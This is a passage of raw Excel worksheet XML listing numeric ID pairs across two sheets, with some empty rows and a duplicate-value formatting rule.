    <row r="1899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1899" s="3">
        <v>700251</v>
      </c>
      <c r="B1899" s="3">
        <v>601920</v>
      </c>
      <c r="D1899" s="5"/>
      <c r="E1899" s="3"/>
    </row>
    <row r="1900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1900" s="3">
        <v>700251</v>
      </c>
      <c r="B1900" s="3">
        <v>600174</v>
      </c>
      <c r="D1900" s="5"/>
      <c r="E1900" s="3"/>
    </row>
    <row r="1901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1901" s="3">
        <v>700251</v>
      </c>
      <c r="B1901" s="3">
        <v>600175</v>
      </c>
      <c r="D1901" s="5"/>
      <c r="E1901" s="3"/>
    </row>
    <row r="1902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1902" s="3">
        <v>700251</v>
      </c>
      <c r="B1902" s="3">
        <v>601923</v>
      </c>
      <c r="D1902" s="5"/>
      <c r="E1902" s="3"/>
    </row>
    <row r="1903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1903" s="3">
        <v>700251</v>
      </c>
      <c r="B1903" s="3">
        <v>601924</v>
      </c>
      <c r="D1903" s="5"/>
      <c r="E1903" s="3"/>
    </row>
    <row r="1904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1904" s="3">
        <v>700251</v>
      </c>
      <c r="B1904" s="3">
        <v>601925</v>
      </c>
      <c r="D1904" s="5"/>
      <c r="E1904" s="3"/>
    </row>
    <row r="1905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1905" s="3">
        <v>700251</v>
      </c>
      <c r="B1905" s="3">
        <v>601926</v>
      </c>
      <c r="D1905" s="5"/>
      <c r="E1905" s="3"/>
    </row>
    <row r="1906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1906" s="3">
        <v>700251</v>
      </c>
      <c r="B1906" s="3">
        <v>601927</v>
      </c>
      <c r="D1906" s="5"/>
      <c r="E1906" s="3"/>
    </row>
    <row r="1907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1907" s="3">
        <v>700251</v>
      </c>
      <c r="B1907" s="3">
        <v>600017</v>
      </c>
      <c r="D1907" s="5"/>
      <c r="E1907" s="3"/>
    </row>
    <row r="1908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1908" s="3">
        <v>700494</v>
      </c>
      <c r="B1908" s="3">
        <v>601929</v>
      </c>
      <c r="D1908" s="5"/>
      <c r="E1908" s="3"/>
    </row>
    <row r="1909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1909" s="3">
        <v>700287</v>
      </c>
      <c r="B1909" s="3">
        <v>601930</v>
      </c>
      <c r="D1909" s="5"/>
      <c r="E1909" s="3"/>
    </row>
    <row r="1910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1910" s="3">
        <v>700027</v>
      </c>
      <c r="B1910" s="3">
        <v>601931</v>
      </c>
      <c r="D1910" s="5"/>
      <c r="E1910" s="3"/>
    </row>
    <row r="1911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1911" s="3">
        <v>700027</v>
      </c>
      <c r="B1911" s="3">
        <v>601932</v>
      </c>
      <c r="D1911" s="5"/>
      <c r="E1911" s="3"/>
    </row>
    <row r="1912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1912" s="3">
        <v>700230</v>
      </c>
      <c r="B1912" s="3">
        <v>601933</v>
      </c>
      <c r="D1912" s="5"/>
      <c r="E1912" s="3"/>
    </row>
    <row r="1913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1913" s="3">
        <v>700230</v>
      </c>
      <c r="B1913" s="3">
        <v>601934</v>
      </c>
      <c r="D1913" s="5"/>
      <c r="E1913" s="3"/>
    </row>
    <row r="1914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1914" s="3">
        <v>700330</v>
      </c>
      <c r="B1914" s="3">
        <v>601935</v>
      </c>
      <c r="D1914" s="5"/>
      <c r="E1914" s="3"/>
    </row>
    <row r="1915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1915" s="3">
        <v>700330</v>
      </c>
      <c r="B1915" s="3">
        <v>601936</v>
      </c>
      <c r="D1915" s="5"/>
      <c r="E1915" s="3"/>
    </row>
    <row r="1916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1916" s="3">
        <v>700086</v>
      </c>
      <c r="B1916" s="3">
        <v>601937</v>
      </c>
      <c r="D1916" s="5"/>
      <c r="E1916" s="3"/>
    </row>
    <row r="1917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1917" s="3">
        <v>700350</v>
      </c>
      <c r="B1917" s="3">
        <v>600051</v>
      </c>
      <c r="D1917" s="5"/>
      <c r="E1917" s="3"/>
    </row>
    <row r="1918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1918" s="3">
        <v>700412</v>
      </c>
      <c r="B1918" s="3">
        <v>600053</v>
      </c>
      <c r="D1918" s="5"/>
      <c r="E1918" s="3"/>
    </row>
    <row r="1919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1919" s="3">
        <v>700412</v>
      </c>
      <c r="B1919" s="3">
        <v>601940</v>
      </c>
      <c r="D1919" s="5"/>
      <c r="E1919" s="3"/>
    </row>
    <row r="1920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1920" s="3">
        <v>700412</v>
      </c>
      <c r="B1920" s="3">
        <v>601941</v>
      </c>
      <c r="D1920" s="5"/>
      <c r="E1920" s="3"/>
    </row>
    <row r="1921" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1921" s="5"/>
    </row>
    <row r="1922" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1922" s="5"/>
    </row>
    <row r="1923" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1923" s="5"/>
    </row>
    <row r="1924" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1924" s="5"/>
    </row>
    <row r="1925" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1925" s="5"/>
    </row>
    <row r="1926" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1926" s="5"/>
    </row>
    <row r="1927" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1927" s="5"/>
    </row>
    <row r="1928" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1928" s="5"/>
    </row>
    <row r="1929" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1929" s="5"/>
    </row>
    <row r="1930" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1930" s="5"/>
    </row>
    <row r="1931" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1931" s="5"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="E2:E1920">
    <cfRule type="duplicateValues" dxfId="8" priority="15"/>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63B64-C534-411C-9C77-D98331FE3ED8}">
  <dimension ref="A1:B747"/>
  <sheetViews>
    <sheetView topLeftCell="A733" workbookViewId="0">
      <selection activeCell="G742" sqref="G742"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>10484</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="5">
        <v>700066</v>
      </c>
      <c r="B2" s="3">
        <v>500024</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="5">
        <v>700065</v>
      </c>
      <c r="B3" s="3">
        <v>500024</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" s="5">
        <v>700469</v>
      </c>
      <c r="B4" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" s="5">
        <v>700202</v>
      </c>
      <c r="B5" s="3">
        <v>500068</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="5">
        <v>700552</v>
      </c>
      <c r="B6" s="3">
        <v>500037</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" s="5">
        <v>700552</v>
      </c>
      <c r="B7" s="3">
        <v>500102</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="5">
        <v>700552</v>
      </c>
      <c r="B8" s="3">
        <v>500045</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="5">
        <v>700552</v>
      </c>
      <c r="B9" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="5">
        <v>700552</v>
      </c>
      <c r="B10" s="3">
        <v>500046</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" s="5">
        <v>700045</v>
      </c>
      <c r="B11" s="3">
        <v>500007</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" s="5">
        <v>700331</v>
      </c>
      <c r="B12" s="3">
        <v>500083</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" s="5">
        <v>700584</v>
      </c>
      <c r="B13" s="3">
        <v>500032</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" s="5">
        <v>700622</v>
      </c>
      <c r="B14" s="3">
        <v>500094</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" s="5">
        <v>700456</v>
      </c>
      <c r="B15" s="3">
        <v>500019</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" s="5">
        <v>700099</v>
      </c>
      <c r="B16" s="3">
        <v>500010</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" s="5">
        <v>700099</v>
      </c>
      <c r="B17" s="3">
        <v>500071</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" s="5">
        <v>700099</v>
      </c>
      <c r="B18" s="3">
        <v>500050</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" s="5">
        <v>700073</v>
      </c>
      <c r="B19" s="3">
        <v>500027</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" s="5">
        <v>700073</v>
      </c>
      <c r="B20" s="3">
        <v>500014</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" s="5">
        <v>700073</v>
      </c>
      <c r="B21" s="3">
        <v>500087</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" s="5">
        <v>700073</v>
      </c>
      <c r="B22" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" s="5">
        <v>700073</v>
      </c>
      <c r="B23" s="3">
        <v>500125</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" s="5">
        <v>700110</v>
      </c>
      <c r="B24" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" s="5">
        <v>700110</v>
      </c>
      <c r="B25" s="3">
        <v>500014</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" s="5">
        <v>700110</v>
      </c>
      <c r="B26" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" s="5">
        <v>700110</v>
      </c>
      <c r="B27" s="3">
        <v>500093</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" s="5">
        <v>700347</v>
      </c>
      <c r="B28" s="3">
        <v>500032</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" s="5">
        <v>700129</v>
      </c>
      <c r="B29" s="3">
        <v>500040</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" s="5">
        <v>700129</v>
      </c>
      <c r="B30" s="3">
        <v>500064</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" s="5">
        <v>700640</v>
      </c>
      <c r="B31" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" s="5">
        <v>700414</v>
      </c>
      <c r="B32" s="3">
        <v>500094</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" s="5">
        <v>700475</v>
      </c>
      <c r="B33" s="3">
        <v>500040</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" s="5">
        <v>700093</v>
      </c>
      <c r="B34" s="3">
        <v>500035</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A35" s="5">
        <v>700031</v>
      </c>
      <c r="B35" s="3">
        <v>500013</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A36" s="5">
        <v>700245</v>
      </c>
      <c r="B36" s="3">
        <v>500032</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A37" s="5">
        <v>700642</v>
      </c>
      <c r="B37" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A38" s="5">
        <v>700128</v>
      </c>
      <c r="B38" s="3">
        <v>500040</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A39" s="5">
        <v>700234</v>
      </c>
      <c r="B39" s="3">
        <v>500070</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A40" s="5">
        <v>700239</v>
      </c>
      <c r="B40" s="3">
        <v>500032</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A41" s="5">
        <v>700534</v>
      </c>
      <c r="B41" s="3">
        <v>500102</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A42" s="5">
        <v>700470</v>
      </c>
      <c r="B42" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A43" s="5">
        <v>700017</v>
      </c>
      <c r="B43" s="3">
        <v>500006</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A44" s="5">
        <v>700268</v>
      </c>
      <c r="B44" s="3">
        <v>500131</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A45" s="5">
        <v>700570</v>
      </c>
      <c r="B45" s="3">
        <v>500119</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A46" s="5">
        <v>700190</v>
      </c>
      <c r="B46" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A47" s="5">
        <v>700190</v>
      </c>
      <c r="B47" s="3">
        <v>500081</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A48" s="5">
        <v>700190</v>
      </c>
      <c r="B48" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A49" s="5">
        <v>700190</v>
      </c>
      <c r="B49" s="3">
        <v>500137</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A50" s="5">
        <v>700069</v>
      </c>
      <c r="B50" s="3">
        <v>500025</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A51" s="5">
        <v>700069</v>
      </c>
      <c r="B51" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A52" s="5">
        <v>700069</v>
      </c>
      <c r="B52" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A53" s="5">
        <v>700089</v>
      </c>
      <c r="B53" s="3">
        <v>500034</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A54" s="5">
        <v>700564</v>
      </c>
      <c r="B54" s="3">
        <v>500093</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A55" s="5">
        <v>700520</v>
      </c>
      <c r="B55" s="3">
        <v>500032</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A56" s="5">
        <v>700521</v>
      </c>
      <c r="B56" s="3">
        <v>500114</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A57" s="5">
        <v>700521</v>
      </c>
      <c r="B57" s="3">
        <v>500102</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A58" s="5">
        <v>700521</v>
      </c>
      <c r="B58" s="3">
        <v>500116</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A59" s="5">
        <v>700657</v>
      </c>
      <c r="B59" s="3">
        <v>500067</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A60" s="5">
        <v>700360</v>
      </c>
      <c r="B60" s="3">
        <v>500049</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A61" s="5">
        <v>700635</v>
      </c>
      <c r="B61" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="62" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A62" s="5">
        <v>700415</v>
      </c>
      <c r="B62" s="3">
        <v>500046</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A63" s="5">
        <v>700651</v>
      </c>
      <c r="B63" s="3">
        <v>500136</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A64" s="5">
        <v>700204</v>
      </c>
      <c r="B64" s="3">
        <v>500066</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A65" s="5">
        <v>700043</v>
      </c>
      <c r="B65" s="3">
        <v>500018</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A66" s="5">
        <v>700471</v>
      </c>
      <c r="B66" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A67" s="5">
        <v>700119</v>
      </c>
      <c r="B67" s="4">
        <v>500006</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A68" s="5">
        <v>700454</v>
      </c>
      <c r="B68" s="3">
        <v>500087</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A69" s="5">
        <v>700025</v>
      </c>
      <c r="B69" s="4">
        <v>500006</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A70" s="5">
        <v>700077</v>
      </c>
      <c r="B70" s="4">
        <v>500029</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A71" s="5">
        <v>700351</v>
      </c>
      <c r="B71" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A72" s="5">
        <v>700030</v>
      </c>
      <c r="B72" s="4">
        <v>500008</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A73" s="5">
        <v>700030</v>
      </c>
      <c r="B73" s="4">
        <v>500046</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A74" s="5">
        <v>700335</v>
      </c>
      <c r="B74" s="4">
        <v>500010</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A75" s="5">
        <v>700261</v>
      </c>
      <c r="B75" s="4">
        <v>500076</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A76" s="5">
        <v>700572</v>
      </c>
      <c r="B76" s="4">
        <v>500123</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A77" s="5">
        <v>700160</v>
      </c>
      <c r="B77" s="3">
        <v>500075</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A78" s="5">
        <v>700160</v>
      </c>
      <c r="B78" s="3">
        <v>500045</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A79" s="5">
        <v>700160</v>
      </c>
      <c r="B79" s="3">
        <v>500007</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A80" s="5">
        <v>700160</v>
      </c>
      <c r="B80" s="3">
        <v>500049</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A81" s="5">
        <v>700160</v>
      </c>
      <c r="B81" s="3">
        <v>500010</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A82" s="5">
        <v>700160</v>
      </c>
      <c r="B82" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A83" s="5">
        <v>700160</v>
      </c>
      <c r="B83" s="3">
        <v>500126</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A84" s="5">
        <v>700144</v>
      </c>
      <c r="B84" s="4">
        <v>500045</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A85" s="5">
        <v>700555</v>
      </c>
      <c r="B85" s="4">
        <v>500034</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A86" s="5">
        <v>700020</v>
      </c>
      <c r="B86" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A87" s="5">
        <v>700020</v>
      </c>
      <c r="B87" s="3">
        <v>500027</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A88" s="5">
        <v>700020</v>
      </c>
      <c r="B88" s="3">
        <v>500093</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A89" s="5">
        <v>700020</v>
      </c>
      <c r="B89" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A90" s="5">
        <v>700020</v>
      </c>
      <c r="B90" s="3">
        <v>500117</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A91" s="5">
        <v>700020</v>
      </c>
      <c r="B91" s="3">
        <v>500125</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A92" s="5">
        <v>700020</v>
      </c>
      <c r="B92" s="3">
        <v>500135</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A93" s="5">
        <v>700023</v>
      </c>
      <c r="B93" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A94" s="5">
        <v>700611</v>
      </c>
      <c r="B94" s="4">
        <v>500092</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A95" s="5">
        <v>700054</v>
      </c>
      <c r="B95" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A96" s="5">
        <v>700106</v>
      </c>
      <c r="B96" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A97" s="5">
        <v>700106</v>
      </c>
      <c r="B97" s="3">
        <v>500072</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A98" s="5">
        <v>700106</v>
      </c>
      <c r="B98" s="3">
        <v>500026</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A99" s="5">
        <v>700106</v>
      </c>
      <c r="B99" s="3">
        <v>500071</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A100" s="5">
        <v>700106</v>
      </c>
      <c r="B100" s="3">
        <v>500045</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A101" s="5">
        <v>700106</v>
      </c>
      <c r="B101" s="3">
        <v>500093</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A102" s="5">
        <v>700154</v>
      </c>
      <c r="B102" s="3">
        <v>500079</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A103" s="5">
        <v>700154</v>
      </c>
      <c r="B103" s="3">
        <v>500073</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A104" s="5">
        <v>700154</v>
      </c>
      <c r="B104" s="3">
        <v>500037</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A105" s="5">
        <v>700154</v>
      </c>
      <c r="B105" s="3">
        <v>500052</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A106" s="5">
        <v>700154</v>
      </c>
      <c r="B106" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A107" s="5">
        <v>700154</v>
      </c>
      <c r="B107" s="3">
        <v>500050</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A108" s="5">
        <v>700154</v>
      </c>
      <c r="B108" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A109" s="5">
        <v>700154</v>
      </c>
      <c r="B109" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A110" s="5">
        <v>700154</v>
      </c>
      <c r="B110" s="3">
        <v>500114</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A111" s="5">
        <v>700154</v>
      </c>
      <c r="B111" s="3">
        <v>500080</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A112" s="5">
        <v>700154</v>
      </c>
      <c r="B112" s="3">
        <v>500102</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A113" s="5">
        <v>700154</v>
      </c>
      <c r="B113" s="3">
        <v>500129</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A114" s="5">
        <v>700154</v>
      </c>
      <c r="B114" s="3">
        <v>500045</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A115" s="5">
        <v>700154</v>
      </c>
      <c r="B115" s="3">
        <v>500119</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A116" s="5">
        <v>700154</v>
      </c>
      <c r="B116" s="3">
        <v>500046</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A117" s="5">
        <v>700154</v>
      </c>
      <c r="B117" s="3">
        <v>500067</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A118" s="5">
        <v>700126</v>
      </c>
      <c r="B118" s="4">
        <v>500010</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A119" s="5">
        <v>700591</v>
      </c>
      <c r="B119" s="3">
        <v>500069</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A120" s="5">
        <v>700591</v>
      </c>
      <c r="B120" s="3">
        <v>500115</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A121" s="5">
        <v>700575</v>
      </c>
      <c r="B121" s="4">
        <v>500102</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A122" s="5">
        <v>700212</v>
      </c>
      <c r="B122" s="4">
        <v>500067</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A123" s="5">
        <v>700137</v>
      </c>
      <c r="B123" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A124" s="5">
        <v>700050</v>
      </c>
      <c r="B124" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A125" s="5">
        <v>700614</v>
      </c>
      <c r="B125" s="4">
        <v>500132</v>
      </c>
    </row>
